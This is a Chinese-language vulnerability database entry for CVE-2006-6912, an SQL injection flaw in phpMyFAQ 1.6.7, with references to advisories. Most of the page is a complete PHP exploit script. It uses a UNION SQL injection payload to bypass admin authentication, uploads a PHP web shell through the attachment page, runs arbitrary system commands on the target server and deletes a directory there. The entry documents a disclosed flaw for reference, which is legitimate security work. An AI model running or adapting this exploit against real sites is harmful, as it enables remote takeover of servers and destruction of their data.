PHPMyFAQ 未明SQL注入漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1112341 漏洞类型 SQL注入
发布时间 2007-03-01 更新时间 2007-03-01
CVE编号 CVE-2006-6912 CNNVD-ID CNNVD-200612-701
漏洞平台 PHP CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/3393
https://www.securityfocus.com/bid/21944
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200612-701
|漏洞详情
phpMyFAQ存在SQL注入漏洞,远程攻击者可以通过未明向量(可能是userfile或filename参数)来执行任意SQL命令。
|漏洞EXP
#!/usr/bin/php5-cgi -q
<?

/*
Sql injection / remote command execution exploit for phpmyfaq < 1.6.8

Bugtraq:
http://www.securityfocus.com/bid/21944

CVS:
http://thinkforge.org/plugins/scmcvs/cvsweb.php/phpmyfaq/admin/attachment.php.diff?r1=1.7.2.11.2.5;r2=1.7.2.11.2.6;cvsroot=phpmyfaq;f=h

./pmf.php http://xxxx.xxxx.edu/faq/ "<? system('id'); ?>" localhost:4001

elgCrew@safe-mail.net
*/

function do_upload($baseurl, $proxy, $cmd)
{

	$fp = fopen("kebab.php", "w");
	if(!$fp)
		die("Cannot open file for writing");

	$code = "Un1q" . $cmd . "<? system(\"rm -rf ../1337/\"); ?>";
	fwrite($fp, $code);
	fclose($fp);
	
	$sendvars["aktion"] = "save";
        $sendvars["uin"] = "-1' UNION SELECT char(0x61,0x64,0x6d,0x69,0x6e),char(0x61,0x61,0x27,0x20,0x4f,0x52,0x20,0x31,0x3d,0x31,0x20,0x2f,0x2a) /*";
        $sendvars["save"] = "TRUE";
        $sendvars["MAX_FILE_SIZE"] = "100000";
        $sendvars["id"] = "1337";
        $sendvars["userfile"] = '@kebab.php';
        $sendvars["filename"] = "kebab.php";

        $posturl = $baseurl . "/admin/attachment.php";
        $ch = curl_init();

        curl_setopt($ch, CURLOPT_URL, $posturl);

        curl_setopt($ch, CURLOPT_PROXY, $proxy);
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
        curl_setopt($ch, CURLOPT_POST, 1);

        curl_setopt($ch, CURLOPT_POSTFIELDS, $sendvars);
        echo "=> Uploading file.\n";
        $result = curl_exec($ch);
	curl_close($ch);
	@unlink("kebab.php");
	$get =  $baseurl . "/attachments/1337/kebab.php\n";

	$ch = curl_init();
	curl_setopt($ch, CURLOPT_URL, $get);
	curl_setopt($ch, CURLOPT_PROXY, $proxy);
	curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
	$result = curl_exec($ch);
	if(strstr($result, "Un1q"))
		echo substr($result, 4);
	else
		echo "Not vulnerable / error ?\n";
	curl_close($ch);


}

if($argc < 3)
{
	printf("Usage: %s http://test.com/phpmyfaq/ \"<? system('uname -a'); ?> \" [proxy]\n", $argv[0]);
	exit(0);
}
if($argc == 4)
	$proxy = $argv[3];
else
	$proxy = "";

do_upload($argv[1], $proxy, $argv[2]);

?>

# milw0rm.com [2007-03-01]
|受影响的产品
phpMyFAQ phpMyFAQ 1.6.7
|参考资料

来源:VUPEN
名称:ADV-2007-0077
链接:http://www.frsirt.com/english/advisories/2007/0077
来源:XF
名称:phpmyfaq-attachment-sql-injection(32802)
链接:http://xforce.iss.net/xforce/xfdb/32802
来源:BID
名称:21944
链接:http://www.securityfocus.com/bid/21944
来源:www.phpmyfaq.de
链接:http://www.phpmyfaq.de/advisory_2006-12-15.php
来源:SECUNIA
名称:23651
链接:http://secunia.com/advisories/23651